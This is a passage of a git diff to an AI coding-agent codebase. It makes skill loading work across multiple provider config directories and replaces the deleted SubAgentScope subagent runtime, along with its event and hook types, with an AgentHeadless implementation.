createDebugLogger('SKILL_MANAGER'); @@ -428,20 +429,20 @@ export class SkillManager { * Gets the base directory for skills at a specific level. 
* * @param level - Storage level - * @returns Absolute directory path + * @returns Absolute directory paths */ - getSkillsBaseDir(level: SkillLevel): string { + getSkillsBaseDirs(level: SkillLevel): string[] { switch (level) { case 'project': - return path.join( - this.config.getProjectRoot(), - QWEN_CONFIG_DIR, - SKILLS_CONFIG_DIR, + return SKILL_PROVIDER_CONFIG_DIRS.map((v) => + path.join(this.config.getProjectRoot(), v, SKILLS_CONFIG_DIR), ); case 'user': - return path.join(os.homedir(), QWEN_CONFIG_DIR, SKILLS_CONFIG_DIR); + return SKILL_PROVIDER_CONFIG_DIRS.map((v) => + path.join(os.homedir(), v, SKILLS_CONFIG_DIR), + ); case 'bundled': - return this.bundledSkillsDir; + return [this.bundledSkillsDir]; case 'extension': throw new Error( 'Extension skills do not have a base directory; they are loaded from active extensions.', @@ -499,9 +500,26 @@ export class SkillManager { return skills; } - const baseDir = this.getSkillsBaseDir(level); - debugLogger.debug(`Loading ${level} level skills from: ${baseDir}`); - const skills = await this.loadSkillsFromDir(baseDir, level); + // Iterate provider directories in PROVIDER_CONFIG_DIRS order. + // The first directory that contains a skill with a given name wins, + // so the order defines implicit precedence (.qwen > .agent > .cursor > ...). 
+ const baseDirs = this.getSkillsBaseDirs(level); + const skills: SkillConfig[] = []; + const seenNames = new Set(); + for (const baseDir of baseDirs) { + debugLogger.debug(`Loading ${level} level skills from: ${baseDir}`); + const skillsFromDir = await this.loadSkillsFromDir(baseDir, level); + for (const skill of skillsFromDir) { + if (seenNames.has(skill.name)) { + debugLogger.debug( + `Skipping duplicate skill at ${level} level: ${skill.name} from ${baseDir}`, + ); + continue; + } + seenNames.add(skill.name); + skills.push(skill); + } + } debugLogger.debug(`Loaded ${skills.length} ${level} level skills`); return skills; } @@ -624,7 +642,8 @@ export class SkillManager { private updateWatchersFromCache(): void { const watchTargets = new Set( (['project', 'user'] as const) - .map((level) => this.getSkillsBaseDir(level)) + .map((level) => this.getSkillsBaseDirs(level)) + .reduce((acc, baseDirs) => acc.concat(baseDirs), []) .filter((baseDir) => fsSync.existsSync(baseDir)), ); @@ -680,7 +699,7 @@ export class SkillManager { } private async ensureUserSkillsDir(): Promise { - const baseDir = this.getSkillsBaseDir('user'); + const baseDir = path.join(os.homedir(), QWEN_CONFIG_DIR, SKILLS_CONFIG_DIR); try { await fs.mkdir(baseDir, { recursive: true }); } catch (error) { diff --git a/packages/core/src/subagents/index.ts b/packages/core/src/subagents/index.ts index 17c62a200..c05c38697 100644 --- a/packages/core/src/subagents/index.ts +++ b/packages/core/src/subagents/index.ts @@ -5,18 +5,11 @@ */ /** - * @fileoverview Subagents Phase 1 implementation - File-based configuration layer + * @fileoverview Subagents — file-based configuration layer. * * This module provides the foundation for the subagents feature by implementing - * a file-based configuration system that builds on the existing SubAgentScope - * runtime system. It includes: + * a file-based configuration system that builds on the agent runtime. 
* - * - Type definitions for file-based subagent configurations - * - Validation system for configuration integrity - * - Runtime conversion functions integrated into the manager - * - Manager class for CRUD operations on subagent files - * - * The implementation follows the Markdown + YAML frontmatter format , with storage at both project and user levels. */ // Core types and interfaces @@ -40,36 +33,3 @@ export { SubagentValidator } from './validation.js'; // Main management class export { SubagentManager } from './subagent-manager.js'; - -// Re-export existing runtime types for convenience -export type { - PromptConfig, - ModelConfig, - RunConfig, - ToolConfig, - SubagentTerminateMode, -} from './types.js'; - -export { SubAgentScope } from './subagent.js'; - -// Event system for UI integration -export type { - SubAgentEvent, - SubAgentStartEvent, - SubAgentRoundEvent, - SubAgentStreamTextEvent, - SubAgentUsageEvent, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentFinishEvent, - SubAgentErrorEvent, - SubAgentApprovalRequestEvent, -} from './subagent-events.js'; - -export { SubAgentEventEmitter, SubAgentEventType } from './subagent-events.js'; - -// Statistics and formatting -export type { - SubagentStatsSummary, - ToolUsageStats, -} from './subagent-statistics.js'; diff --git a/packages/core/src/subagents/subagent-events.ts b/packages/core/src/subagents/subagent-events.ts deleted file mode 100644 index 5de09a3c2..000000000 --- a/packages/core/src/subagents/subagent-events.ts +++ /dev/null @@ -1,145 +0,0 @@ -/** - * @license - * Copyright 2025 Qwen - * SPDX-License-Identifier: Apache-2.0 - */ - -import { EventEmitter } from 'events'; -import type { - ToolCallConfirmationDetails, - ToolConfirmationOutcome, - ToolResultDisplay, -} from '../tools/tools.js'; -import type { Part, GenerateContentResponseUsageMetadata } from '@google/genai'; - -export type SubAgentEvent = - | 'start' - | 'round_start' - | 'round_end' - | 'stream_text' - | 'tool_call' - | 
'tool_result' - | 'tool_waiting_approval' - | 'usage_metadata' - | 'finish' - | 'error'; - -export enum SubAgentEventType { - START = 'start', - ROUND_START = 'round_start', - ROUND_END = 'round_end', - STREAM_TEXT = 'stream_text', - TOOL_CALL = 'tool_call', - TOOL_RESULT = 'tool_result', - TOOL_WAITING_APPROVAL = 'tool_waiting_approval', - USAGE_METADATA = 'usage_metadata', - FINISH = 'finish', - ERROR = 'error', -} - -export interface SubAgentStartEvent { - subagentId: string; - name: string; - model?: string; - tools: string[]; - timestamp: number; -} - -export interface SubAgentRoundEvent { - subagentId: string; - round: number; - promptId: string; - timestamp: number; -} - -export interface SubAgentStreamTextEvent { - subagentId: string; - round: number; - text: string; - /** Whether this text is reasoning/thinking content (as opposed to regular output) */ - thought?: boolean; - timestamp: number; -} - -export interface SubAgentUsageEvent { - subagentId: string; - round: number; - usage: GenerateContentResponseUsageMetadata; - durationMs?: number; - timestamp: number; -} - -export interface SubAgentToolCallEvent { - subagentId: string; - round: number; - callId: string; - name: string; - args: Record; - description: string; - timestamp: number; -} - -export interface SubAgentToolResultEvent { - subagentId: string; - round: number; - callId: string; - name: string; - success: boolean; - error?: string; - responseParts?: Part[]; - resultDisplay?: ToolResultDisplay; - durationMs?: number; - timestamp: number; -} - -export interface SubAgentApprovalRequestEvent { - subagentId: string; - round: number; - callId: string; - name: string; - description: string; - confirmationDetails: Omit & { - type: ToolCallConfirmationDetails['type']; - }; - respond: ( - outcome: ToolConfirmationOutcome, - payload?: Parameters[1], - ) => Promise; - timestamp: number; -} - -export interface SubAgentFinishEvent { - subagentId: string; - terminateReason: string; - timestamp: number; - 
rounds?: number; - totalDurationMs?: number; - totalToolCalls?: number; - successfulToolCalls?: number; - failedToolCalls?: number; - inputTokens?: number; - outputTokens?: number; - totalTokens?: number; -} - -export interface SubAgentErrorEvent { - subagentId: string; - error: string; - timestamp: number; -} - -export class SubAgentEventEmitter { - private ee = new EventEmitter(); - - on(event: SubAgentEvent, listener: (...args: unknown[]) => void) { - this.ee.on(event, listener); - } - - off(event: SubAgentEvent, listener: (...args: unknown[]) => void) { - this.ee.off(event, listener); - } - - emit(event: SubAgentEvent, payload: unknown) { - this.ee.emit(event, payload); - } -} diff --git a/packages/core/src/subagents/subagent-hooks.ts b/packages/core/src/subagents/subagent-hooks.ts deleted file mode 100644 index f3bf997bf..000000000 --- a/packages/core/src/subagents/subagent-hooks.ts +++ /dev/null @@ -1,33 +0,0 @@ -/** - * @license - * Copyright 2025 Qwen - * SPDX-License-Identifier: Apache-2.0 - */ - -export interface PreToolUsePayload { - subagentId: string; - name: string; // subagent name - toolName: string; - args: Record; - timestamp: number; -} - -export interface PostToolUsePayload extends PreToolUsePayload { - success: boolean; - durationMs: number; - errorMessage?: string; -} - -export interface SubagentStopPayload { - subagentId: string; - name: string; // subagent name - terminateReason: string; - summary: Record; - timestamp: number; -} - -export interface SubagentHooks { - preToolUse?(payload: PreToolUsePayload): Promise | void; - postToolUse?(payload: PostToolUsePayload): Promise | void; - onStop?(payload: SubagentStopPayload): Promise | void; -} diff --git a/packages/core/src/subagents/subagent-manager.ts b/packages/core/src/subagents/subagent-manager.ts index 0552fa60c..21ad85129 100644 --- a/packages/core/src/subagents/subagent-manager.ts +++ b/packages/core/src/subagents/subagent-manager.ts @@ -19,14 +19,20 @@ import type { SubagentLevel, 
ListSubagentsOptions, CreateSubagentOptions, +} from './types.js'; +import type { PromptConfig, ModelConfig, RunConfig, ToolConfig, -} from './types.js'; +} from '../agents/runtime/agent-types.js'; import { SubagentError, SubagentErrorCode } from './types.js'; import { SubagentValidator } from './validation.js'; -import { SubAgentScope } from './subagent.js'; +import { AgentHeadless } from '../agents/runtime/agent-headless.js'; +import type { + AgentEventEmitter, + AgentHooks, +} from '../agents/runtime/agent-events.js'; import type { Config } from '../config/config.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { normalizeContent } from '../utils/textUtils.js'; @@ -579,24 +585,24 @@ export class SubagentManager { } /** - * Creates a SubAgentScope from a subagent configuration. + * Creates an AgentHeadless from a subagent configuration. * * @param config - Subagent configuration * @param runtimeContext - Runtime context - * @returns Promise resolving to SubAgentScope + * @returns Promise resolving to AgentHeadless */ - async createSubagentScope( + async createAgentHeadless( config: SubagentConfig, runtimeContext: Config, options?: { - eventEmitter?: import('./subagent-events.js').SubAgentEventEmitter; - hooks?: import('./subagent-hooks.js').SubagentHooks; + eventEmitter?: AgentEventEmitter; + hooks?: AgentHooks; }, - ): Promise { + ): Promise { try { const runtimeConfig = this.convertToRuntimeConfig(config); - return await SubAgentScope.create( + return await AgentHeadless.create( config.name, runtimeContext, runtimeConfig.promptConfig, @@ -609,7 +615,7 @@ export class SubagentManager { } catch (error) { if (error instanceof Error) { throw new SubagentError( - `Failed to create SubAgentScope: ${error.message}`, + `Failed to create AgentHeadless: ${error.message}`, SubagentErrorCode.INVALID_CONFIG, config.name, ); @@ -620,10 +626,10 @@ export class SubagentManager { /** * Converts a file-based SubagentConfig to runtime configuration - * 
compatible with SubAgentScope.create(). + * compatible with AgentHeadless.create(). * * @param config - File-based subagent configuration - * @returns Runtime configuration for SubAgentScope + * @returns Runtime configuration for AgentHeadless */ convertToRuntimeConfig(config: SubagentConfig): SubagentRuntimeConfig { // Build prompt configuration diff --git a/packages/core/src/subagents/subagent.ts b/packages/core/src/subagents/subagent.ts deleted file mode 100644 index 613bc8044..000000000 --- a/packages/core/src/subagents/subagent.ts +++ /dev/null @@ -1,1010 +0,0 @@ -/** - * @license - * Copyright 2025 Qwen - * SPDX-License-Identifier: Apache-2.0 - */ - -import { reportError } from '../utils/errorReporting.js'; -import type { Config } from '../config/config.js'; -import { createDebugLogger } from '../utils/debugLogger.js'; - -const debugLogger = createDebugLogger('SUBAGENT'); -import { type ToolCallRequestInfo } from '../core/turn.js'; -import { - CoreToolScheduler, - type ToolCall, - type WaitingToolCall, -} from '../core/coreToolScheduler.js'; -import type { - ToolConfirmationOutcome, - ToolCallConfirmationDetails, -} from '../tools/tools.js'; -import { getInitialChatHistory } from '../utils/environmentContext.js'; -import type { - Content, - Part, - FunctionCall, - GenerateContentConfig, - FunctionDeclaration, - GenerateContentResponseUsageMetadata, -} from '@google/genai'; -import { GeminiChat } from '../core/geminiChat.js'; -import type { - PromptConfig, - ModelConfig, - RunConfig, - ToolConfig, -} from './types.js'; -import { SubagentTerminateMode } from './types.js'; -import type { - SubAgentFinishEvent, - SubAgentRoundEvent, - SubAgentStartEvent, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentErrorEvent, - SubAgentUsageEvent, -} from './subagent-events.js'; -import { - type SubAgentEventEmitter, - SubAgentEventType, -} from './subagent-events.js'; -import { - SubagentStatistics, - type SubagentStatsSummary, -} from 
'./subagent-statistics.js'; -import type { SubagentHooks } from './subagent-hooks.js'; -import { logSubagentExecution } from '../telemetry/loggers.js'; -import { SubagentExecutionEvent } from '../telemetry/types.js'; -import { TaskTool } from '../tools/task.js'; -import { DEFAULT_QWEN_MODEL } from '../config/models.js'; - -/** - * @fileoverview Defines the configuration interfaces for a subagent. - * - * These interfaces specify the structure for defining the subagent's prompt, - * the model parameters, and the execution settings. - */ - -interface ExecutionStats { - startTimeMs: number; - totalDurationMs: number; - rounds: number; - totalToolCalls: number; - successfulToolCalls: number; - failedToolCalls: number; - inputTokens?: number; - outputTokens?: number; - totalTokens?: number; - estimatedCost?: number; -} - -/** - * Manages the runtime context state for the subagent. - * This class provides a mechanism to store and retrieve key-value pairs - * that represent the dynamic state and variables accessible to the subagent - * during its execution. - */ -export class ContextState { - private state: Record = {}; - - /** - * Retrieves a value from the context state. - * - * @param key - The key of the value to retrieve. - * @returns The value associated with the key, or undefined if the key is not found. - */ - get(key: string): unknown { - return this.state[key]; - } - - /** - * Sets a value in the context state. - * - * @param key - The key to set the value under. - * @param value - The value to set. - */ - set(key: string, value: unknown): void { - this.state[key] = value; - } - - /** - * Retrieves all keys in the context state. - * - * @returns An array of all keys in the context state. - */ - get_keys(): string[] { - return Object.keys(this.state); - } -} - -/** - * Replaces `${...}` placeholders in a template string with values from a context. 
- * - * This function identifies all placeholders in the format `${key}`, validates that - * each key exists in the provided `ContextState`, and then performs the substitution. - * - * @param template The template string containing placeholders. - * @param context The `ContextState` object providing placeholder values. - * @returns The populated string with all placeholders replaced. - * @throws {Error} if any placeholder key is not found in the context. - */ -function templateString(template: string, context: ContextState): string { - const placeholderRegex = /\$\{(\w+)\}/g; - - // First, find all unique keys required by the template. - const requiredKeys = new Set( - Array.from(template.matchAll(placeholderRegex), (match) => match[1]), - ); - - // Check if all required keys exist in the context. - const contextKeys = new Set(context.get_keys()); - const missingKeys = Array.from(requiredKeys).filter( - (key) => !contextKeys.has(key), - ); - - if (missingKeys.length > 0) { - throw new Error( - `Missing context values for the following keys: ${missingKeys.join( - ', ', - )}`, - ); - } - - // Perform the replacement using a replacer function. - return template.replace(placeholderRegex, (_match, key) => - String(context.get(key)), - ); -} - -/** - * Represents the scope and execution environment for a subagent. - * This class orchestrates the subagent's lifecycle, managing its chat interactions, - * runtime context, and the collection of its outputs. 
- */ -export class SubAgentScope { - executionStats: ExecutionStats = { - startTimeMs: 0, - totalDurationMs: 0, - rounds: 0, - totalToolCalls: 0, - successfulToolCalls: 0, - failedToolCalls: 0, - inputTokens: 0, - outputTokens: 0, - totalTokens: 0, - estimatedCost: 0, - }; - private toolUsage = new Map< - string, - { - count: number; - success: number; - failure: number; - lastError?: string; - totalDurationMs?: number; - averageDurationMs?: number; - } - >(); - private eventEmitter?: SubAgentEventEmitter; - private finalText: string = ''; - private terminateMode: SubagentTerminateMode = SubagentTerminateMode.ERROR; - private readonly stats = new SubagentStatistics(); - private hooks?: SubagentHooks; - private readonly subagentId: string; - - /** - * Constructs a new SubAgentScope instance. - * @param name - The name for the subagent, used for logging and identification. - * @param runtimeContext - The shared runtime configuration and services. - * @param promptConfig - Configuration for the subagent's prompt and behavior. - * @param modelConfig - Configuration for the generative model parameters. - * @param runConfig - Configuration for the subagent's execution environment. - * @param toolConfig - Optional configuration for tools available to the subagent. - */ - private constructor( - readonly name: string, - readonly runtimeContext: Config, - private readonly promptConfig: PromptConfig, - private readonly modelConfig: ModelConfig, - private readonly runConfig: RunConfig, - private readonly toolConfig?: ToolConfig, - eventEmitter?: SubAgentEventEmitter, - hooks?: SubagentHooks, - ) { - const randomPart = Math.random().toString(36).slice(2, 8); - this.subagentId = `${this.name}-${randomPart}`; - this.eventEmitter = eventEmitter; - this.hooks = hooks; - } - - /** - * Creates and validates a new SubAgentScope instance. 
- * This factory method ensures that all tools provided in the prompt configuration - * are valid for non-interactive use before creating the subagent instance. - * @param {string} name - The name of the subagent. - * @param {Config} runtimeContext - The shared runtime configuration and services. - * @param {PromptConfig} promptConfig - Configuration for the subagent's prompt and behavior. - * @param {ModelConfig} modelConfig - Configuration for the generative model parameters. - * @param {RunConfig} runConfig - Configuration for the subagent's execution environment. - * @param {ToolConfig} [toolConfig] - Optional configuration for tools. - * @returns {Promise} A promise that resolves to a valid SubAgentScope instance. - * @throws {Error} If any tool requires user confirmation. - */ - static async create( - name: string, - runtimeContext: Config, - promptConfig: PromptConfig, - modelConfig: ModelConfig, - runConfig: RunConfig, - toolConfig?: ToolConfig, - eventEmitter?: SubAgentEventEmitter, - hooks?: SubagentHooks, - ): Promise { - return new SubAgentScope( - name, - runtimeContext, - promptConfig, - modelConfig, - runConfig, - toolConfig, - eventEmitter, - hooks, - ); - } - - /** - * Runs the subagent in a non-interactive mode. - * This method orchestrates the subagent's execution loop, including prompt templating, - * tool execution, and termination conditions. - * @param {ContextState} context - The current context state containing variables for prompt templating. - * @returns {Promise} A promise that resolves when the subagent has completed its execution. 
- */ - async runNonInteractive( - context: ContextState, - externalSignal?: AbortSignal, - ): Promise { - const chat = await this.createChatObject(context); - - if (!chat) { - this.terminateMode = SubagentTerminateMode.ERROR; - return; - } - - // Track the current round's AbortController for external signal propagation - let currentRoundAbortController: AbortController | null = null; - const onExternalAbort = () => { - currentRoundAbortController?.abort(); - }; - if (externalSignal) { - externalSignal.addEventListener('abort', onExternalAbort); - } - - const toolRegistry = this.runtimeContext.getToolRegistry(); - - // Prepare the list of tools available to the subagent. - // If no explicit toolConfig or it contains "*" or is empty, inherit all tools. - const toolsList: FunctionDeclaration[] = []; - if (this.toolConfig) { - const asStrings = this.toolConfig.tools.filter( - (t): t is string => typeof t === 'string', - ); - const hasWildcard = asStrings.includes('*'); - const onlyInlineDecls = this.toolConfig.tools.filter( - (t): t is FunctionDeclaration => typeof t !== 'string', - ); - - if (hasWildcard || asStrings.length === 0) { - toolsList.push( - ...toolRegistry - .getFunctionDeclarations() - .filter((t) => t.name !== TaskTool.Name), - ); - } else { - toolsList.push( - ...toolRegistry.getFunctionDeclarationsFiltered(asStrings), - ); - } - toolsList.push(...onlyInlineDecls); - } else { - // Inherit all available tools by default when not specified. - toolsList.push( - ...toolRegistry - .getFunctionDeclarations() - .filter((t) => t.name !== TaskTool.Name), - ); - } - - const initialTaskText = String( - (context.get('task_prompt') as string) ?? 
'Get Started!', - ); - let currentMessages: Content[] = [ - { role: 'user', parts: [{ text: initialTaskText }] }, - ]; - - const startTime = Date.now(); - this.executionStats.startTimeMs = startTime; - this.stats.start(startTime); - let turnCounter = 0; - try { - // Emit start event - this.eventEmitter?.emit(SubAgentEventType.START, { - subagentId: this.subagentId, - name: this.name, - model: - this.modelConfig.model || - this.runtimeContext.getModel() || - DEFAULT_QWEN_MODEL, - tools: (this.toolConfig?.tools || ['*']).map((t) => - typeof t === 'string' ? t : t.name, - ), - timestamp: Date.now(), - } as SubAgentStartEvent); - - // Log telemetry for subagent start - const startEvent = new SubagentExecutionEvent(this.name, 'started'); - logSubagentExecution(this.runtimeContext, startEvent); - while (true) { - // Create a new AbortController for each round to avoid listener accumulation - const roundAbortController = new AbortController(); - currentRoundAbortController = roundAbortController; - - // If external signal already aborted, cancel immediately - if (externalSignal?.aborted) { - roundAbortController.abort(); - } - - // Check termination conditions. 
- if ( - this.runConfig.max_turns && - turnCounter >= this.runConfig.max_turns - ) { - this.terminateMode = SubagentTerminateMode.MAX_TURNS; - break; - } - let durationMin = (Date.now() - startTime) / (1000 * 60); - if ( - this.runConfig.max_time_minutes && - durationMin >= this.runConfig.max_time_minutes - ) { - this.terminateMode = SubagentTerminateMode.TIMEOUT; - break; - } - - const promptId = `${this.runtimeContext.getSessionId()}#${this.subagentId}#${turnCounter++}`; - - const messageParams = { - message: currentMessages[0]?.parts || [], - config: { - abortSignal: roundAbortController.signal, - tools: [{ functionDeclarations: toolsList }], - }, - }; - - const roundStreamStart = Date.now(); - const responseStream = await chat.sendMessageStream( - this.modelConfig.model || - this.runtimeContext.getModel() || - DEFAULT_QWEN_MODEL, - messageParams, - promptId, - ); - this.eventEmitter?.emit(SubAgentEventType.ROUND_START, { - subagentId: this.subagentId, - round: turnCounter, - promptId, - timestamp: Date.now(), - } as SubAgentRoundEvent); - - const functionCalls: FunctionCall[] = []; - let roundText = ''; - let lastUsage: GenerateContentResponseUsageMetadata | undefined = - undefined; - let currentResponseId: string | undefined = undefined; - for await (const streamEvent of responseStream) { - if (roundAbortController.signal.aborted) { - this.terminateMode = SubagentTerminateMode.CANCELLED; - return; - } - - // Handle retry events - if (streamEvent.type === 'retry') { - continue; - } - - // Handle chunk events - if (streamEvent.type === 'chunk') { - const resp = streamEvent.value; - // Track the response ID for tool call correlation - if (resp.responseId) { - currentResponseId = resp.responseId; - } - if (resp.functionCalls) functionCalls.push(...resp.functionCalls); - const content = resp.candidates?.[0]?.content; - const parts = content?.parts || []; - for (const p of parts) { - const txt = p.text; - const isThought = p.thought ?? 
false; - if (txt && !isThought) roundText += txt; - if (txt) - this.eventEmitter?.emit(SubAgentEventType.STREAM_TEXT, { - subagentId: this.subagentId, - round: turnCounter, - text: txt, - thought: isThought, - timestamp: Date.now(), - }); - } - if (resp.usageMetadata) lastUsage = resp.usageMetadata; - } - } - this.executionStats.rounds = turnCounter; - this.stats.setRounds(turnCounter); - - durationMin = (Date.now() - startTime) / (1000 * 60); - if ( - this.runConfig.max_time_minutes && - durationMin >= this.runConfig.max_time_minutes - ) { - this.terminateMode = SubagentTerminateMode.TIMEOUT; - break; - } - - // Update token usage if available - if (lastUsage) { - const inTok = Number(lastUsage.promptTokenCount || 0); - const outTok = Number(lastUsage.candidatesTokenCount || 0); - const thoughtTok = Number(lastUsage.thoughtsTokenCount || 0); - const cachedTok = Number(lastUsage.cachedContentTokenCount || 0); - if ( - isFinite(inTok) || - isFinite(outTok) || - isFinite(thoughtTok) || - isFinite(cachedTok) - ) { - this.stats.recordTokens( - isFinite(inTok) ? inTok : 0, - isFinite(outTok) ? outTok : 0, - isFinite(thoughtTok) ? thoughtTok : 0, - isFinite(cachedTok) ? cachedTok : 0, - ); - // mirror legacy fields for compatibility - this.executionStats.inputTokens = - (this.executionStats.inputTokens || 0) + - (isFinite(inTok) ? inTok : 0); - this.executionStats.outputTokens = - (this.executionStats.outputTokens || 0) + - (isFinite(outTok) ? outTok : 0); - this.executionStats.totalTokens = - (this.executionStats.inputTokens || 0) + - (this.executionStats.outputTokens || 0) + - (isFinite(thoughtTok) ? thoughtTok : 0) + - (isFinite(cachedTok) ? 
cachedTok : 0); - this.executionStats.estimatedCost = - (this.executionStats.inputTokens || 0) * 3e-5 + - (this.executionStats.outputTokens || 0) * 6e-5; - } - this.eventEmitter?.emit(SubAgentEventType.USAGE_METADATA, { - subagentId: this.subagentId, - round: turnCounter, - usage: lastUsage, - durationMs: Date.now() - roundStreamStart, - timestamp: Date.now(), - } as SubAgentUsageEvent); - } - - if (functionCalls.length > 0) { - currentMessages = await this.processFunctionCalls( - functionCalls, - roundAbortController, - promptId, - turnCounter, - toolsList, - currentResponseId, - ); - } else { - // No tool calls — treat this as the model's final answer. - if (roundText && roundText.trim().length > 0) { - this.finalText = roundText.trim(); - this.terminateMode = SubagentTerminateMode.GOAL; - break; - } - // Otherwise, nudge the model to finalize a result. - currentMessages = [ - { - role: 'user', - parts: [ - { - text: 'Please provide the final result now and stop calling tools.', - }, - ], - }, - ]; - } - this.eventEmitter?.emit(SubAgentEventType.ROUND_END, { - subagentId: this.subagentId, - round: turnCounter, - promptId, - timestamp: Date.now(), - } as SubAgentRoundEvent); - } - } catch (error) { - debugLogger.error('Error during subagent execution:', error); - this.terminateMode = SubagentTerminateMode.ERROR; - this.eventEmitter?.emit(SubAgentEventType.ERROR, { - subagentId: this.subagentId, - error: error instanceof Error ? 
error.message : String(error), - timestamp: Date.now(), - } as SubAgentErrorEvent); - - throw error; - } finally { - if (externalSignal) { - externalSignal.removeEventListener('abort', onExternalAbort); - } - // Clear the reference to allow GC - currentRoundAbortController = null; - this.executionStats.totalDurationMs = Date.now() - startTime; - const summary = this.stats.getSummary(Date.now()); - this.eventEmitter?.emit(SubAgentEventType.FINISH, { - subagentId: this.subagentId, - terminateReason: this.terminateMode, - timestamp: Date.now(), - rounds: summary.rounds, - totalDurationMs: summary.totalDurationMs, - totalToolCalls: summary.totalToolCalls, - successfulToolCalls: summary.successfulToolCalls, - failedToolCalls: summary.failedToolCalls, - inputTokens: summary.inputTokens, - outputTokens: summary.outputTokens, - totalTokens: summary.totalTokens, - } as SubAgentFinishEvent); - - const completionEvent = new SubagentExecutionEvent( - this.name, - this.terminateMode === SubagentTerminateMode.GOAL - ? 'completed' - : 'failed', - { - terminate_reason: this.terminateMode, - result: this.finalText, - execution_summary: this.stats.formatCompact( - 'Subagent execution completed', - ), - }, - ); - logSubagentExecution(this.runtimeContext, completionEvent); - - await this.hooks?.onStop?.({ - subagentId: this.subagentId, - name: this.name, - terminateReason: this.terminateMode, - summary: summary as unknown as Record, - timestamp: Date.now(), - }); - } - } - - /** - * Processes a list of function calls, executing each one and collecting their responses. - * This method iterates through the provided function calls, executes them using the - * `executeToolCall` function (or handles `self.emitvalue` internally), and aggregates - * their results. It also manages error reporting for failed tool executions. - * @param {FunctionCall[]} functionCalls - An array of `FunctionCall` objects to process. 
- * @param {ToolRegistry} toolRegistry - The tool registry to look up and execute tools. - * @param {AbortController} abortController - An `AbortController` to signal cancellation of tool executions. - * @param {string} responseId - Optional API response ID for correlation with tool calls. - * @returns {Promise} A promise that resolves to an array of `Content` parts representing the tool responses, - * which are then used to update the chat history. - */ - private async processFunctionCalls( - functionCalls: FunctionCall[], - abortController: AbortController, - promptId: string, - currentRound: number, - toolsList: FunctionDeclaration[], - responseId?: string, - ): Promise { - const toolResponseParts: Part[] = []; - - // Build allowed tool names set for filtering - const allowedToolNames = new Set(toolsList.map((t) => t.name)); - - // Filter unauthorized tool calls before scheduling - const authorizedCalls: FunctionCall[] = []; - for (const fc of functionCalls) { - const callId = fc.id ?? `${fc.name}-${Date.now()}`; - - if (!allowedToolNames.has(fc.name)) { - const toolName = String(fc.name); - const errorMessage = `Tool "${toolName}" not found. Tools must use the exact names provided.`; - - // Emit TOOL_CALL event for visibility - this.eventEmitter?.emit(SubAgentEventType.TOOL_CALL, { - subagentId: this.subagentId, - round: currentRound, - callId, - name: toolName, - args: fc.args ?? 
{}, - description: `Tool "${toolName}" not found`, - timestamp: Date.now(), - } as SubAgentToolCallEvent); - - // Build function response part (used for both event and LLM) - const functionResponsePart = { - functionResponse: { - id: callId, - name: toolName, - response: { error: errorMessage }, - }, - }; - - // Emit TOOL_RESULT event with error (include responseParts for UI rendering) - this.eventEmitter?.emit(SubAgentEventType.TOOL_RESULT, { - subagentId: this.subagentId, - round: currentRound, - callId, - name: toolName, - success: false, - error: errorMessage, - responseParts: [functionResponsePart], - resultDisplay: errorMessage, - durationMs: 0, - timestamp: Date.now(), - } as SubAgentToolResultEvent); - - // Record blocked tool call in stats - this.recordToolCallStats(toolName, false, 0, errorMessage); - - // Add function response for LLM - toolResponseParts.push(functionResponsePart); - continue; - } - authorizedCalls.push(fc); - } - - // Build scheduler - const responded = new Set(); - let resolveBatch: (() => void) | null = null; - const scheduler = new CoreToolScheduler({ - config: this.runtimeContext, - outputUpdateHandler: undefined, - onAllToolCallsComplete: async (completedCalls) => { - for (const call of completedCalls) { - const toolName = call.request.name; - const duration = call.durationMs ?? 0; - const success = call.status === 'success'; - const errorMessage = - call.status === 'error' || call.status === 'cancelled' - ? call.response.error?.message - : undefined; - - // Record stats - this.recordToolCallStats(toolName, success, duration, errorMessage); - - // Emit tool result event - this.eventEmitter?.emit(SubAgentEventType.TOOL_RESULT, { - subagentId: this.subagentId, - round: currentRound, - callId: call.request.callId, - name: toolName, - success, - error: errorMessage, - responseParts: call.response.responseParts, - resultDisplay: call.response.resultDisplay - ? typeof call.response.resultDisplay === 'string' - ? 
call.response.resultDisplay - : JSON.stringify(call.response.resultDisplay) - : undefined, - durationMs: duration, - timestamp: Date.now(), - } as SubAgentToolResultEvent); - - // post-tool hook - await this.hooks?.postToolUse?.({ - subagentId: this.subagentId, - name: this.name, - toolName, - args: call.request.args, - success, - durationMs: duration, - errorMessage, - timestamp: Date.now(), - }); - - // Append response parts - const respParts = call.response.responseParts; - if (respParts) { - const parts = Array.isArray(respParts) ? respParts : [respParts]; - for (const part of parts) { - if (typeof part === 'string') { - toolResponseParts.push({ text: part }); - } else if (part) { - toolResponseParts.push(part); - } - } - } - } - // Signal that this batch is complete (all tools terminal) - resolveBatch?.(); - }, - onToolCallsUpdate: (calls: ToolCall[]) => { - for (const call of calls) { - if (call.status !== 'awaiting_approval') continue; - const waiting = call as WaitingToolCall; - - // Emit approval request event for UI visibility - try { - const { confirmationDetails } = waiting; - const { onConfirm: _onConfirm, ...rest } = confirmationDetails; - this.eventEmitter?.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, { - subagentId: this.subagentId, - round: currentRound, - callId: waiting.request.callId, - name: waiting.request.name, - description: this.getToolDescription( - waiting.request.name, - waiting.request.args, - ), - confirmationDetails: rest, - respond: async ( - outcome: ToolConfirmationOutcome, - payload?: Parameters< - ToolCallConfirmationDetails['onConfirm'] - >[1], - ) => { - if (responded.has(waiting.request.callId)) return; - responded.add(waiting.request.callId); - await waiting.confirmationDetails.onConfirm(outcome, payload); - }, - timestamp: Date.now(), - }); - } catch { - // ignore UI event emission failures - } - - // UI now renders inline confirmation via task tool live output. 
